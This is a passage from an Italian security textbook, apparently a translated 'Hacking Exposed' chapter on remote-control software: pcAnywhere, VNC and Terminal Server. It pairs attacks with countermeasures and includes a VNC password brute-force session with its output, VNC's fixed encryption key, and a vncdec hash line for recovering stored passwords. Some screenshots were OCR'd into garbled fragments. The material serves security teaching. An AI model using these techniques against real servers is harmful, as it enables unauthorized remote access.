3. Si serve di pcAnywhere o Remotely Possible 4.0 per collegarsi al sistema, 
utilizzando il proprio account per ottenere l’accesso, 
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Se il software che utilizzate prevede file distinti per conservare le autorizzazioni di 
connessione, con ogni probabilità il vostro prodotto risulta vulnerabile a questo 
tipo di attacco. Potete sperimentarlo voi stessi. 


° Contromisure per il software di accesso remoto 


Esistono diversi possibili rimedi per i problemi di sicurezza descritti finora. Questi ac- 
corgimenti contribuiranno notevolmente a rendere più robusta la vostra installazione. 


Attivazione delle password 


Per quanto evidente e intuitivo per la maggior parte degli amministratori, il sempli- 
ce accorgimento di obbligare alla definizione di nomi utente e password sulle mac- 
chine remote non è sempre adottato. D'altra parte gli stessi produttori non sono 
sempre diligenti e lasciano agli amministratori la responsabilità di attivare questa 
protezione. Come potete notare nel caso di pcAnywhere (Figura 13.2), lo schema di 
autenticazione predefinito è un po’ troppo elastico: per rimediare a questa situazio- 
ne è sufficiente selezionare l’opzione Specify Individual Caller Privileges. 


NETWORK Properties Ei 


Connection Info | Settings Callers | Security Options | Conferences | Protect Item | 


Figura 13.2 
L'autenticazione di default di pcAnywhere 8.0 è impostata a Allow full access to all callers. 


Utilizzo di password “forti” 


Alcune applicazioni, tra cui pcAnywhere, permettono di specificare meccanismi più 
robusti di definizione della password, come il riconoscimento di maiuscole e minu- 
scole. Per attivare questa funzionalità in pcAnywhere, selezionate le proprietà della 
voce Network, quindi aprite la scheda Security Options e attivate la casella Make 
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passwords case sensitive. Come si può notare nella Figura 13.3, le opzioni per il lo- 
gin di default non prevedono il riconoscimento di maiuscole e minuscole. 


Connection Info | Settings | Callers Security Options | Conference | Protect Item | 
3 —_|r Eneryption level-- 


[cANYWHERE “] 


TT Deny Lower Encryption Level 


| ph | Private Key Container: | 
| | ” 
lara E | Certificate Common Name: 
RR I a am. 

\ TT Make passwords case sensitive | k 

| FW Limit login attempts per call | > Session oplione 


Magimum: (3 =] 


| W Limit time to complete login 


Figura 13.3 


Una delle tante funzionalità di protezione offerte da pcAnywhere, il riconoscimento di maiuscole 
e minuscole nelle password (Make passwords case sensitive): assicuratevi che sia attivata, 


Timbuktu prevede un analogo meccanismo di protezione delle password, sotto for- 
ma di vincolo sul riutilizzo delle password, sul numero di caratteri e sulla durata 
delle password, come si vede nella figura seguente. 


Password Restrictions 
‘Enforca these password restrictions on users connecting to this computer — 
MW Passwords can't match the thies previous passwords 
F Minimum number of characters in passworde {7 
RM Number of days until password expites fed 


fan o 


Forzatura di metodi di autenticazione alternativi 


La maggior parte delle applicazioni prevede una forma alternativa di autenticazione, 
oltre a quella nativa di NT. Tuttavia, normalmente questa è disattivata di default. Que- 
sto rimedio, che sicuramente può essere fastidioso perché impone di mantenere due 
insiemi di nomi utente e password, può essere decisivo per ostacolare gli intrusi. 
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Il meccanismo di autenticazione predefinito per RAdmin, Remotely Possible e Con- 
trolIT è diverso da quello di NT, ma Timbuktu, ReachOut e Remotely Possible utiliz- 
zano di default solo l'autenticazione NT. Il problema dell’autenticazione NT è che 
una volta che il sistema è compromesso, l’intruso ha a disposizione le password di 
tutti gli utenti che utilizzano il sistema di controllo remoto. In una procedura di au- 
tenticazione non Windows la complessità delle password, il blocco degli account, 
l'amministrazione a livello del dominio, la pianificazione del cambio delle password 
e le politiche per il loro riutilizzo sono completamente diverse dall'autenticazione 
Windows. Per sfruttare al meglio entrambe queste caratteristiche, perciò, è consi- 
gliabile servirsi di un programma di controllo remoto dotato di una propria proce- 
dura di autenticazione, al quale associare un tempo di inattività molto breve per ef- 
fettuare il blocco dello schermo. In questo modo l’utente remoto (o l’hacker, secon- 
do i casi) dovrà fornire due diverse credenziali, per poter accedere al sistema. 


Protezione con password dei file dei profili e di configurazione 


Sia Timbuktu sia pcAnywhere prevedono ulteriori forme di protezione delle pass- 
word che sarebbe opportuno utilizzare, se possibile. PcAnywhere permette di proteg- 
gere con una password i profili per le chiamate sia in uscita sia in ingresso. In questo 
modo si impedisce a chiunque di leggere le password mascherate. PcAnywhere per- 
mette anche di impostare una password per i profili (aumentando il livello di sicurez- 
za) utilizzando la scheda Protect Item all’interno della finestra Network Properties. 
Oltre alle possibilità offerte da peAnywhere, Timbuktu consente di limitare l’acces- 
so alle preferenze di protezione. 


Connection Info | Settings | Callers | Security Options | Conference. Protect Item | 
Please enter the password you will use to protect this item. 


SA It no password is entered, anyone who has access to this PC can view. execute or 
modify this item. 


Password: Poe 
Confim password [eee 


Disconnessione dell’utente al termine della chiamata 


Remotely Possible/ControlIT, pcAnywhere e ReachOut prevedono un'opzione che 
permette di scollegare l’utente al termine della chiamata. Si tratta di un aspetto non 
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irrilevante perché, se al termine della connessione l'amministratore si dimentica di 
scollegarsi, l'autore della chiamata successiva ottiene i privilegi di amministrazione, 
che consentono di accedere a server e dati critici. Nel caso di ReachOut si procede 
nel modo seguente. 


1. Selezionate il menu Security. 
2. Selezionate la scheda Disconnect, quindi attivate l'opzione Log The Current 
User Off This Computer. 
Scollegare gli utenti dal sistema al termine della connessione impedisce che un hac- 
ker possa collegarsi al sistema utilizzando le autorizzazioni dell'utente precedente. 


Cifratura del traffico della sessione 


Con le versioni più vecchie della maggior parte dei sistemi di controllo remoto, era 
possibile leggere direttamente dal cavo i nomi utente e le password, o decifrarli con 
estrema facilità. Assicuratevi di utilizzare il massimo livello di cifratura previsto dal 
vostro software. Il miglior metodo per verificare questo aspetto è un buon analizza- 
tore di pacchetti con funzionalità di decodifica, come SnifferPro di Network Asso- 
ciates (http://www.nai.com). L’inadeguatezza di molti prodotti dal punto di vista 
della cifratura non mancherà di stupirvi. Quando selezionate un'applicazione di 
controllo remoto assicuratevi che siano abilitate sia l'autenticazione delle password 
sia la cifratura del traffico. 


Limitazione del numero di tentativi di connessione 


La maggior parte delle applicazioni permette di limitare il numero di tentativi di con- 
nessione consentiti a una persona prima di essere buttata fuori. È un fattore importan- 
te, perché risulta frustrante per l’intruso e lo spinge a cercare sistemi più deboli, o al- 
meno aumenta le probabilità di intercettare i tentativi di intrusione e risalire ai respon- 
sabili. Vi consigliamo un massimo di tre tentativi prima di scollegare l’utente. 


Registrazione dei tentativi falliti 


Tramite il registro degli eventi di NT o un file proprietario, il vostro sistema di control- 
lo remoto dovrebbe registrare i tentativi di connessione andati a buon fine e non. 
Questo può rivelarsi fondamentale per intercettare e identificare gli intrusi. 


Esclusione degli utenti non autenticati 


Questa è probabilmente una delle funzionalità di protezione più importanti applica- 
bili, ma sfortunatamente sono pochissime le applicazioni di controllo remoto a pre- 
vederla. Tra quelle che abbiamo testato, ReachOut di Stac Electronics è l'unica a of- 
frire quello che viene definito IntruderGuard. Per attivare questa importante funzio- 
nalità si procede nel modo seguente. 

1. Aprite il menu Security. 

2. Nella scheda Connect, selezionate Yrip IntruderGuard sotto User Lockout, 


quindi impostate un numero ragionevole di tentativi. Vi consigliamo di per- 
mettere tre tentativi prima di buttare fuori l’utente. 


Modifica della porta di ascolto predefinita 


Molte persone non considerano questo accorgimento una vera e propria soluzione, 
perché applica il paradigma della “sicurezza nell’ignoranza”, intrinsecamente para- 
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dossale. Ma in anni di lavoro sulla sicurezza abbiamo imparato ad apprezzare la re- 
gola del “di tutto un po’, In altre parole, è necessario adottare tutti i possibili rimedi 
per la protezione: certamente non rende inespugnabile il sistema, ma se non altro 
scoraggia gli intrusi improvvisati dal proseguire. 


Virtual Network Computing (VNC) 


Virtual Network Computing è nato nei laboratori AT&T Research di Cambridge, in 
Gran Bretagna, ed è disponibile al sito http: //ww.realvne.com/. VNC offre mol- 
te funzionalità uniche nel suo genere. Per prima cosa, la compatibilità inter-piatta- 
forma: il prodotto può essere installato in desktop Windows, Linux e Solaris e utiliz- 
zato da macchine Windows, Linux, Solaris, Macintosh e persino dispositivi Win- 
dows CE. VNC prevede anche un'interfaccia Java utilizzabile da qualsiasi browser 
con supporto Java, come Netscape Communicator o Microsoft Internet Explorer. Ma 
l’aspetto più entusiasmante è che VNC è gratuito! 

Tenuto conto della quantità di caratteristiche e funzionalità fornite da VNC, non c'è 

da stupirsi se il suo utilizzo comporta serie implicazioni dal punto di vista della sicu- 

rezza. In particolare VNC risente del problema di lettura delle password con Revela- 
tion. Abbiamo già dimostrato nel Capitolo 5 quanto sia facile installarlo su una mac- 
china Windows NT mediante una connessione di rete remota: è sufficiente installare 

il servizio VNC dalla riga di comando dopo aver apportato una semplice modifica al 

Registro di sistema remoto per garantire che il servizio resti invisibile (le versioni a 

partire dalla 3.3.2 si presentano nella barra delle applicazioni e sono quindi visibili 

agli utenti interattivi). Ovviamente WinVNC.EXE compare nell’elenco dei processi 

attivi indipendentemente dal numero di versione o dalla modalità. Ma soprattutto è 

vulnerabile ai seguenti attacchi. 

e Ricerca della password VNC con il metodo “forza bruta”, L'utilizzo di pass- 
word deboli consente a un hacker di ottenere il controllo completo del si- 
stema su cui viene eseguito il server VNC. 

e Intercettazione del traffico di rete. Come impostazione predefinita, VNC 
non utilizza nessun tipo di cifratura del flusso dopo che un utente si è regi- 
strato sul server VNC. 


e  Mascheramento debole delle password WinVNC. WinVNC memorizza la 
password del server utilizzando un metodo di mascheratura che può con- 
sentire a un hacker di risalire al testo in chiaro. 


Parleremo di questo tipo di attacchi in seguito. 


® Ricerca della password VNC 
con il metodo “forza bruta” 


Diffusione: S 
Semplicità: 9 
Impatto: rà 
Fattore di rischio: 7 


Il meccanismo di sicurezza principale che protegge il server VNC da un accesso 
non autorizzato è rappresentato dalla password scelta dall'amministratore. Come 
abbiamo già detto diverse volte nel corso di questo libro, l'utilizzo di password de- 
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boli è una delle vulnerabilità più semplici che possono essere sfruttate da un hac- 
ker. Poiché spesso VNC viene eseguito con accesso privilegiato, gli hacker più de- 
terminati sarebbero disposti a qualunque cosa pur di ottenere una password del 
server VNC. A semplificare ulteriormente le cose, per l'hacker, c’è il fatto che nelle 
attuali implementazioni di VNC vengono sfruttati per l'autenticazione solo i primi 
otto caratteri della password: questo significa che per forzare la password 
“password1$A&!” basta digitare semplicemente “password”. 

Uno dei meccanismi che può essere utilizzato per ricercare la password VNC preve- 
de l'installazione di un aggiornamento sul client VNC vneviewer. Questa patch, 
rfbproto.c, è disponibile all'indirizzo Web http://ww.securiteam.com/tools/ 
Brute _forcing VNC_passwords.html e deve essere applicata alla distribuzione 
vnc-3.3.3r1_unixsrc.tgz utilizzando il comando patch. Un attacco a forza bruta dei 
server VNC è banale, come dimostrato dall’esempio seguente: 


[crush]# vneviewer 192.168.1.101 

VNC server supports protocol version 3.3 (viewer 3.3) 
Trying password '#!comment:' 

VNC authentication failed 

Trying password 'Common' 

VNC authentication failed 

Trying password 'passwords,' 

VNC authentication failed 

Trying password 'compiled' 

VNC authentication failed 

Trying password 'passwd' 

VNC authentication failed 

Trying password 'test' 

VNC authentication succeeded 

Desktop name "twistervm" 

Connected to VNC server, using protocol version 3.3 


Il client vneviewer aggiornato esamina velocemente un elenco di password for- 
nito dall'utente e individua la password “test”. Quindi esegue la connessione al 
server remoto per consentire agli hacker di assumere il controllo completo del si- 
stema. Questo processo di deduzione della password è estremamente veloce e il 
server VNC non genera alcun messaggio che indichi un tentativo di connessione 
fallito. 


Contromisura alla ricerca della password 
di un server VNC remoto 


Quando si configura il server VNC, è importante scegliere una password di accesso 
forte. La password dovrebbe essere composta da almeno otto caratteri e non do- 
vrebbe essere una parola del dizionario o una parola derivata dal dizionario. Ricor- 
date che questa password è l’unico meccanismo di difesa del sistema dagli hacker 
esterni. Quindi, sceglietela con saggezza! 


510 Capitolo 13 


(_) Intercettazione del traffico di rete con VNC 


Diffusione: 2 
Semplicità: 3 
Impatto: 7 
Fattore di rischio: 4 


Se VNC viene installato senza apportare alcuna modifica, dopo l'autenticazione tut- 
to il traffico di rete scambiato tra il client e il server è in chiaro. Anche se è obiettiva- 
mente più difficile intercettare questo traffico rispetto a quello di una sessione tel- 
net, poiché i dati viaggiano in formato compresso, non è sicuramente impossibile. Il 
codice sorgente di VNC è già disponibile e non passerà molto prima che venga svi- 
luppato uno sniffer dedicato per VNC. Pertanto è estremamente rischioso utilizzare 
sessioni VNC prive di cifratura. Sebbene l'autenticazione della password VNC inizia- 
le preveda un protocollo di tipo challenge/response, tutto il resto del traffico che 
passa sul cavo non è cifrato. È pertanto plausibile ipotizzare che un hacker possa 
monitorare le sessioni VNC e intercettare le password di altri sistemi cui l’utente si 
collega durante l’utilizzo di VNC. 


° Contromisura all’intercettazione del traffico YVNC 


Fortunatamente sono disponibili diversi meccanismi che possono essere utilizzati per 
cifrare il traffico VNC. Tra questi, il principale prevede l'utilizzo del protocollo SSH 
per realizzare un incapsulamento con cifratura delle sessioni VNC scambiate tra client 
e server. Per informazioni più dettagliate sull'utilizzo di SSH con VNC, consultate il 
sito Web all'indirizzo http://ww.uk.research.att.com/vnc/sshvnc.html. Inoltre, 
è possibile applicare al codice sorgente VNC alcune patch (http://web.mit.edu/ 
thouis/vnc/) per realizzare una connessione più sicura che sfrutta la chiave di cifra- 
tura pubblica SSLeay. Potete, inoltre, limitare il numero degli indirizzi IP sorgente che 
possono connettersi a VNC. Sui sistemi UNIX, per controllare gli indirizzi IP in ingres- 
so è possibile servirsi di wrapper TCP (http://ww.uk.research.att.com/vnc/ 
archives/1998-09/0168.html), mentre in WinVNC dovrete indicare gli indirizzi IP 
autorizzati nella chiave HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthHosts 
del Registro di sistema. Potete trovare ulteriori informazioni sulla configurazione di 
AuthHosts all'indirizzo Web http://ww.uk.research.att.com/vnc/winvne.html. 


® Mascheramento debole della password WinVNC 


Diffusione: 6 
Semplicità: 9 
Impatto: 7 
Fattore di rischio: È 


Nell'ottobre del 1999, Conde Vampiro rese di pubblico dominio diverse vulnerabili- 
tà relative a VNC (http://www.securiteam.com/securitynews/3P5QERFQ0Q.ht- 
ml). La più significativa era quella relativa al metodo utilizzato da VNC per memo- 
rizzare la password del server (in particolare nel Registro di sistema di Windows). 
VNC utilizza 3DES per cifrare la password del server VNC e una chiave fissa (23 
82107 6 35 78 88 7) ogniqualvolta la password viene salvata. Anche in questo caso 
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abbiamo un esempio di utilizzo di un ottimo algoritmo di cifratura (3DES) in un'im- 
plementazione debole. Poiché infatti è nota la chiave di cifratura, decifrare la pas- 
sword di un qualsiasi server VNC è un esercizio banale. 

La password VNC è memorizzata nella chiave di Registro HKEY_USERS\. DE - 
FAULT\SOFTWARE\ORL\WinVNC3\Password. Nel nostro esempio, la porzione dati 
della chiave è: 


2F 98 1D CS 48 EQ SE C2 


È possibile utilizzare un programma come vnedec (http://packetstorm.securi- 
ty.org/Crackers/vnedec.c) per risalire alla password VNC se è stato manomesso 
un server su cui viene eseguito VNC (per ulteriori informazioni sulle tecniche di 
hacking di Windows NT e Windows 2000, si veda il Capitolo 5). Prima di compilare il 
codice sorgente è necessario apportare delle modifiche in modo che la riga di codice 
relativa alla password abbia l'aspetto seguente: 


/{* put your password hash here in p[] */ 
char p[]={0x2F,0x98,0x1D,0xC5,0x48,@xE0,@x9E,0xC2}; 


A questo punto è possibile eseguire il build e lanciare vnedec: 


[shadow]# vnedec 
test 


Come mostrato, siamo stati in grado di risalire alla password in chiaro del server, 
“test”, con pochissimo sforzo. 


Contromisura al mascheramento debole 
della password VNC 


Al momento in cui stiamo scrivendo il libro, questa vulnerabilità è ancora presente 
nella versione corrente di VNC. La migliore difesa consiste nell'impedire che un 
hacker abbia accesso al Registro di sistema del sistema adottando delle politiche di 
sicurezza specifiche per i singoli host. Nei Capitoli 5 e 6 viene fornito l'elenco com- 
pleto delle contromisure che è possibile adottare per rafforzare la sicurezza dei si- 
stemi Windows NT e 2000. 


VNC prevede una FAQ che affronta alcuni temi legati alla sicurezza, dispo- 
LA nibile all'indirizzo http://ww.uk.research.att.com/vnc/faq.html. 


Microsoft Terminal Server e Citrix ICA 


Prima del server Web, ancora prima del file server, esisteva il terminale cosiddetto 
“stupido”. Organizzazioni d’avanguardia hanno investito milioni di dollari in questi 
sistemi, che elaboravano qualsiasi cosa in modalità locale. Gli utenti vi accedevano 
tramite semplici terminali a menu, per inserire e recuperare i dati. Oggi una delle 
migliori attrattive per le grandi organizzazioni è il cosiddetto thin clieni, una solu- 
zione in grado di fornire soluzioni audio, video e l'accesso alle applicazioni di pun- 
ta senza la necessità di aggiornare continuamente il desktop dell'utente. Certo, il 
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thin client potrà risolvere questi problemi, tuttavia riporta in auge la buona vecchia 
tecnica che consiste nell’uscire dalle applicazioni per eseguire i programmi con di- 
ritti di accesso più elevati. In NT, come abbiamo visto, ci sono alcuni modi per au- 
mentare i privilegi da utente ad amministratore: queste tecniche consentono solo di 
lavorare a livello locale su una workstation, mentre è sempre necessario avere i di- 
ritti sulla rete per possedere veramente un dominio, 

Il Terminal Server ha cambiato tutto questo in un lampo. Oggi un attacco che elevi 
i privilegi di accesso potrebbe garantire a un hacker il possesso dei dati sui sistemi 
che contengono informazioni finanziarie, legali o di ricerca. Il terminal server ha 
causato la proliferazione di tutta una serie di attacchi specifici per le proprie vulne- 
rabilità, che si aggiungono a quelli relativi a Windows 2000, i più critici dei quali in- 
teressano l'alterazione dei permessi di accesso. La sicurezza del Terminal Server, se 
non è implementata perfettamente, può rappresentare l’anello debole. Le aree su 
cui occorre concentrare la nostra attenzione sono tre: il server, il client e la connes- 
sione dati. 


Server 


Tutti i server Windows 2000 consentono l'amministrazione remota via Terminal Ser- 
ver, che può essere attivata o disattivata tramite l'opzione Aggiungi/Rimuovi compo- 
nenti di Windows del Pannello di controllo. Windows 2000 e NT possono anche 
fornire i servizi cosiddetti thin client. Per le aziende che richiedono l’accesso al Ter- 
minal Server da mondi non Microsoft, è possibile ricorrere al plug-in Citrix Metafra- 
me: in questo paragrafo, se non diversamente segnalato, ci riferiremo alla sua im- 
plementazione Microsoft, 

Windows XP ha apportato un notevole miglioramento, includendo i servizi terminal 
nella versione Professional, sotto la voce Connessione desktop remoto: sul sito di Mi- 
crosoft è possibile reperire istruzioni chiare sul processo di configurazione di que- 
sto servizio. La semplificazione dell’utilizzo e della configurazione dei servizi termi- 
nal ha avuto come conseguenza l'aumento degli attacchi ai Terminal Server, nei 
contesti di rete Windows XP. In questo capitolo, laddove non diversamente specifi- 
cato, la trattazione sarà riferita ai servizi offerti da Connessione desktop remoto di 
Windows XP Professional. 

La configurazione host è l’area principale per gli attacchi eseguiti localmente, non 
da remoto. In modalità predefinita, il server è in ascolto sulla porta 3389. Molti pro- 
cessi di scan includono questa porta nell’enumerazione, per cui il fatto di permette- 
re le connessioni al Terminal Server di un sistema particolarmente critico senza altre 
misure di protezione darà senz'altro origine a problemi di sicurezza. Come vedre- 
mo, è piuttosto banale fare in modo che il server rimanga in ascolto su una porta a 
vostra scelta. 


Client 


Sono molti i client che possono connettersi a un Terminal Server: essi vanno dagli 
eseguibili stand-alone a 16 e 32 bit, agli ActiveX via Web, ai plug-in Terminal Server 
di Microsoft Management Console (MMC). Ogni versione del client, malgrado sia di- 
versa nell'implementazione, esegue di base la negoziazione e la crittografia della 
connessione nello stesso modo. Le differenze principali riguardano la modifica del- 
le impostazioni lato-client nelle versioni stand-alone, l'impatto potenziale sulla con- 
figurazione installata in seguito all'aggiunta di un server Web IIS per consentire l’ac- 
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cesso utente a un client ActiveX e la possibilità di consentire inavvertitamente l’ac- 
cesso agli hacker. 


Trasmissione dei dati 


I dati del Terminal Server sono trasmessi tramite il protocollo Microsoft RDP-5 (Re- 
mote Desktop Protocol) oppure, nel caso di Citrix, tramite il protocollo ICA. Entram- 
bi i sistemi possono essere configurati per garantire la trasmissione sicura dei dati 
una volta che siano stati autenticati. I due sistemi presentano vantaggi in termini di 
prestazioni, ma anche problemi relativi alla sicurezza per quanto riguarda le rispet- 
tive tecnologie di trasmissione dati. 


Ricerca degli obiettivi 


La configurazione predefinita del Terminal Server rimane in ascolto sulla porta TCP 
3389. Un hacker può rintracciare questo servizio di ascolto con una semplice opera- 
zione di scan sugli indirizzi IP, Sempre che il servizio trovato risieda su un server 
con un'installazione standard, l’hacker potrebbe eseguire il proprio client di Termi- 
nal Server e si vedrebbe apparire la richiesta di login e password. Per contrastare 
questa possibilità, si possono prevedere alcune contromisure, tendenti a rendere 
più difficile l’identificazione della porta predefinita. Tuttavia, notate che le stesse 
contromisure possono essere utilizzate dagli hacker per mascherare installazioni di 
frodo dei Servizi terminal o di Connessione desktop remoto: fortunatamente, sono 
disponibili diversi tool per rilevare la porta sulla quale sono in esecuzione servizi 
terminal. 


1) TSProbe 


Diffusione: 8 
Semplicità: 8 
Impatto: 9 
Fattore di rischio: 7 


TSProbe, un grandioso piccolo programma di utilità disponibile all'indirizzo http:// 
ww.HammerofGod.com, esegue l’iterazione all’interno di una sottorete, cercando di 
aprire un handle di Terminal Server per ogni indirizzo IP. Il trucco in questo caso è 
che per ricevere un handle l’hacker deve essere autenticato. Se non lo è, otterrà come 
risposta che non è stato trovato nessun server (“no server found”), anche se il Termi- 
nal Server è disponibile. Di norma, soltanto un amministratore o un utente di Termi- 
nal Server dispongono di queste credenziali. Questo è un metodo efficace per scan- 
nerizzare una sottorete completa alla ricerca di sessioni di Terminal Server in esecu- 
zione all'interno dell'organizzazione, quando si è già accreditati in rete e quando la 
porta predefinita del servizio è stata modificata. In molti casi un Terminal Server è 
configurato come “jump box” in un segmento privato critico di LAN, separato dal re- 
sto della rete. 
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CD) TSEnum 


Diffusione: a 
Semplicità: 8 
Impatto: 9 
Fattore di rischio: È 


TSEnum, sempre disponibile all'indirizzo http://www.HammerofGod.com, è assai 
più potente di TSProbe e si serve di un metodo di enumerazione differente. In mo- 
dalità predefinita, un Terminal Server è registrato con il browser Master. TSEnum ef- 
fettua alcune chiamate API NetServerEnum e richiede i valori di ritorno della struttu- 
ra Server_Info_101. Anche se la porta del Terminal Server in ascolto è stata modifi- 
cata, la registrazione viene effettuata regolarmente e ogni Terminal Server di cui il 
browser è al corrente sarà enumerato e restituito da TSEnum: tutto ciò che occorre 
è l'accesso alla porta 139. Inoltre, questa tecnica non richiede nessuna autenticazio- 
ne particolare e funziona anche se il Terminal Server obiettivo ha il valore Restrict- 
Anonymous impostato a 1. 


© Contromisura all’enumerazione 


I soli momenti in cui un Terminal Server dovrebbe risultare accessibile su Internet è 
quando è espressamente previsto che lo sia e quando i rischi connessi sono stati 
ben valutati e compresi. Troppo spesso ci è accaduto di lavorare presso clienti il cui 
gruppo di sicurezza aveva malamente impostato un firewall, permettendoci così di 
accedere a porte di numerazione elevata. Nel caso del Terminal Server, se il sistema 
è parte del dominio, in modalità predefinita potrebbe anche fornirci il nome del do- 
minio stesso. 

A seconda del caso, dovrebbero essere definite liste di controllo degli accessi (ACL, 
Access Control List) per determinare a quali indirizzi Internet specifici debba essere 
consentito l’accesso: questo accorgimento può aiutare ad attenuare i rischi, garan- 
tendo la cosiddetta “difesa in profondità”. La gestione delle liste ACL è altrettanto 
importante dall'interno, in cui le regole del firewall dovrebbero ridurre gli accessi 
dall'esterno alla DMZ. In molti casi, le regole per l’accesso dalla LAN verso la DMZ 
non sono impostate per escludere tutti (“deny all”), e si limitano ad ammettere host 
specifici per ogni porta. Per ottenere queste ACL potete servirvi dei router locali 0 
dei firewall oppure, se il vostro sistema è basato su Windows 2000 o Windows XP, 
potete definire i criteri di protezione IP affinché consentano la connessione ai servi- 
zi terminal solo a un determinato indirizzo IP. 

Il servizio di Terminal Server rimane in ascolto in modalità nascosta, il cosiddetto 
“stealth mode”: una scansione completa di un Terminal Server potrebbe rivelare 
una porta aperta, ma dovete richiedere una sessione per determinare se il servizio 
in ascolto è veramente un Terminal Server. Modificando la porta in una diversa, co- 
mune per un altro servizio, oppure di numerazione più elevata, potete ridurre 
l'esposizione ai rischi. 
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Contromisura per le porte del server terminal 


La porta predefinita in ascolto può essere modificata, cambiando il valore da 3389 
alla porta desiderata, nella chiave di registro seguente: 


\HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp 
Value: PortNumber REG_DWORD=3389 


I La modifica della porta predefinita del server è valida solo in ambienti in 


cui è attivo il client stand-alone: è comunque richiesta anche la modifica 
del client, come indicato di seguito. 


La connessione di un client a questo servizio su una porta non standard richiede la 
redirezione della porta o la modifica della porta di destinazione, che possono esse- 
re eseguite facilmente sul client stand-alone. 
1. Create una connessione per l’indirizzo del vostro Terminal Server. 
2. Esportate la connessione in un file .CNS, evidenziando la connessione e se- 
lezionando File/Export. 
3. Editate con il Blocco note il file .CNS, modificando la porta server nel modo 
preferito. 
4. Importate il file .CNS nel manager della connessione client. 


P® // client ActiveX di Terminal Server è in ascolto sulla porta TCP 3389 e non 
Ro può essere modificato. 


Attacchi a Terminal Server 


Terminal Server introduce nuovi rischi e preoccupazioni sia in modalità Ammini- 
strativa sia in modalità Application Server. Come si verifica con qualsiasi nuova 
tecnologia, la sua perfetta comprensione in termini di requisiti utente e di sicurez- 
za può contribuire ad attenuare l'esposizione ai rischi potenziali. Dal momento 
che un certo grado di esposizione è comunque presente nella rete, oggi la vera 
sfida consiste nel limitare questa esposizione, pur continuando a fornire servizi 
validi. La prima area su cui ci soffermeremo è quella degli attacchi lanciati senza 
privilegi correnti. 


1) Buffer overflow di RegAPl.dil 


Diffusione: 3 
Semplicità: 5 
Impatto: 10 
Fattore di rischio: 6 


Questa vulnerabilità interessava una debolezza di identificazione e di autorizzazio- 
ne grafica presente nel file MSGINA.dll di Windows NT 4.0: l'inserimento di una 
stringa lunga nel campo username poteva causare diversi problemi. Se questa ope- 
razione era effettuata da remoto, provocava l'interruzione della connessione; se 
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eseguita localmente, causava il blocco del sistema. Particolarmente pericoloso era il 
caso in cui veniva fornito un input contenente comandi da eseguire sul sistema 
come utente SYSTEM. 


© Contromisura al buffer overflow di RegAPI.dil 


Microsoft ha rilasciato la patch MS00-087 nel novembre 2000. Questo aggiornamento 
elimina questa vulnerabilità modificando il servizio Terminal Server e gestendo i dati 
correttamente. Ulteriori informazioni su questo argomento sono disponibili all'indirizzo 
http://ww.microsoft.com/technet/security/bulletin/MS00-087.asp. 


® 
CL) IME Remote root compromise 


Diffusione: 2 
Semplicità: 2 
Impatto: 9 
Fattore di rischio: 4 


Il software è convertito e scritto per diverse lingue nazionali. Uno degli strumenti 
utilizzato da Microsoft per questa “traduzione” è l'editor IME Unput Method Fditor), 
che fa sì che la mappatura di una tastiera standard a 101 tasti possa essere combina- 
ta in migliaia di rappresentazioni per lingue come il cinese o il coreano. Sfortunata- 
mente, non veniva eseguita nessuna validazione dell'input e il contesto operativo di 
IME era SYSTEM. Questo ha permesso un attacco remoto contro i sistemi nella ver- 
sione cinese e contro quelli in cui al momento dell’installazione erano state installa- 
te le estensioni in cinese semplificato. 


Contromisura per IME 


Microsoft ha rilasciato una nota tecnica (MS00-069) e un aggiornamento per atte- 
nuare i rischi nelle versioni interessate; ha inoltre affermato che il problema non si 
verifica da nessun'altra sede. Ulteriori informazioni su questo argomento sono di- 
sponibili all'indirizzo http://Www.microsoft.com/technet/treeview/default. 
asp?url=/technet/security/bulletin/MS00-069.asp. 


® ICA Weak encryption 


Diffusione: 2 
Semplicità: 3 
Impatto: 7 
Fattore di rischio: 4 


Forse il problema più ricorrente che emerge dalla valutazione di qualsiasi rete è 
l'utilizzo di protocolli in chiaro per la sottoscrizione o la gestione. Nella gran parte 
dei casi, il protocollo Microsoft RDP mantiene un canale crittografato di tutti i dati 
importanti: abbiamo comunque scoperto un problema con il canale che trasmette 
il nome del computer client e delle share di stampa, meglio dettagliato nell’artico- 
lo KB Q275727. Nel caso dell’implementazione Citrix, un hacker potrebbe avere 
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accesso alle informazioni di sottoscrizione, a causa della debolezza nella tecnica 
utilizzata da Citrix per l'implementazione della crittografia XOR. I pacchetti cattu- 
rati in seguito potrebbero essere decodificati facilmente ricorrendo all'applicazio- 
ne icadecrypt, disponibile su Internet. 

Per ulteriori informazioni, potete consultare la documentazione all’indirizzo http: 
//ww.securiteam/securitynews/5XQ0H000CK.html. 


Contromisura per ICA 


La soluzione migliore consiste nel promuovere la vostra implementazione Citrix, 
iniziando a utilizzare la sottoscrizione Secure ISA, che si serve di un meccani- 
smo di codifica più robusto, prima di stabilire la sessione di crittografia con il 
canale ICA. 


C) Attacco per alterazione dei privilegi utente 


Diffusione: 6 
Semplicità: 5 
Impatto: 10 
Fattore di rischio: 7 


Nei precedenti capitoli abbiamo trattato espressamente degli attacchi di altera- 
zione dei privilegi in Microsoft Windows. Come anticipato all’inizio di questo 
paragrafo, il Terminal Server ha portato questi attacchi a un nuovo grado di po- 
tenziale inimmaginabile. È assolutamente necessario verificare la configurazione 
base del Terminal Server per assicurarsi che i programmi siano eseguiti all'avvio 
e che siano presenti controlli per limitare il numero e il tipo degli strumenti uti- 
lizzabili. Di questo parleremo nel paragrafo successivo, “Considerazioni aggiun- 
tive sulla sicurezza”. 

Tuttavia, in alcuni casi, gli utenti che accedono tramite Terminal Server anche in 
modalità Application Server, per i loro compiti aziendali specifici devono essere 
in grado di caricare software: questa considerazione è valida specialmente nelle 
configurazioni di sviluppo. Per questo motivo siete aperti agli attacchi locali, 
come le richieste degli agenti DDE di rete, il fatto di impersonare le cosiddette 
named pipe e così via, che fanno sì che l'utente ottenga i privilegi di ammini- 
stratore. Grazie all’interfaccia grafica e ai browser Web è piuttosto facile per un 
utente caricare questi e altri strumenti che aiutano nell'alterazione di privilegi di 
sistema. Una volta che l'’hacker ha ottenuto i privilegi di amministratore, gli stru- 
menti che ha installato gli possono servire per avere accesso ai sistemi e alle ri- 
sorse interne riservate. 


DI Contromisura all’attacco ai privilegi dell’utente 


È vitale che tutte le patch relative ai buffer overflow locali siano installate sui si- 
stemi Terminal Server che permettono l'accesso di account non privilegiati. 
Quando implementate soluzioni di tipo Terminal Server, dovete creare un'unità 
